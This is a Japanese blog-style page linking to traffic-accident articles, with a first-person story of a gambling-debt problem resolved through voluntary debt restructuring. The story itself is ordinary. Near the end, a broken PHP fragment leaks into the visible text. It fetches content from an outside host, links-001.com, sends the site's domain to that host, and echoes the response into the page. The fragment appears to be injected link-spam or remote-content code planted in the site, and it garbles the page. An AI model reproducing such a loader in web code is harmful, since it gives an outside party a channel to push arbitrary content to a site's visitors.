前へ
次へ

交通事故を起こした時の対処方法

自動車やバイク等を運転する方は交通事故を起こしてしまうリスクが誰にでもあります。
実際の交通事故を起こ

more

交通事故を起こす前に免許の返納を考える父

時々テレビや新聞などで高齢者ドライバーが起こした交通事故のニュースを見かけます。
中にはまだ小さいお子

more

単独での交通事故の時に必要な知識

交通事故には相手がいる事故と相手がいない単独事故が存在しますが、単独事故の時にドライバーがすべき事が

more

債務整理について色々なことを学んだ

私が以前勤めていた会社は残業が多い上にストレスの溜まる仕事だったこともありイライラが爆発しそうになったことが何度もあったのですが、それを抑えるためにギャンブルをやって何とかモヤモヤ感を発散していました。
最初のうちは給料の範囲内で楽しんでいてある程度満足していたのですが、何度もやっていくうちに段々と掛け金が多くなり給料だけでは足りず借金をするようになりました。
それでもリボ払いだったこともありコツコツ返せば何とかなると思っていたのですが、その額がどんどん増えてとても返済できる額ではなくなってしまいこれは不味いと思い知り合いの弁護士に相談しました。
知り合いの弁護士も私が借金をするのが意外だったみたいでどうせ大した額ではないだろうと思っていたらしいのですが、借金の額を聞いた時にこれは何とかしないと行けないと思ったみたいです。
このままでは借金がどんどん増えて行き首が回らなくなってしまうということで色々考えてくれたのですが、最終的には債務整理をしなければ解決することはできないと言われました。
この時初めて債務整理という言葉を聞いて私なりに色々と調べたのですが、大きく分けて過払い金請求と任意整理、民事再生と自己破産の4つがあることが分かりました。
このうち私が選択することができるのは任意整理か自己破産だと思ったのですが、自己破産をすれば今後の収入を生活費に充てることができるのでこれは良いと思いました。
ただこの場合住宅や車のような高額な財産は手放さなければならないと聞いたので、この2つがなければ生活するのに本当に困るので考え込んでしまいました。
もう一つの任意整理の場合は借金の減額や金利の引き延ばしを消費者金融と交渉することにより実現して、毎月生活をするのに支障のない範囲内で借金を返済するというものだったので任意整理に非常に魅力を感じました。
そこで弁護士に頼んで消費者金融と交渉してもらい毎月支払う返済額を減額してもらったのですが、このおかげで毎月少しずつ借金を返済すれば良いことになったので本当に助かりました。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top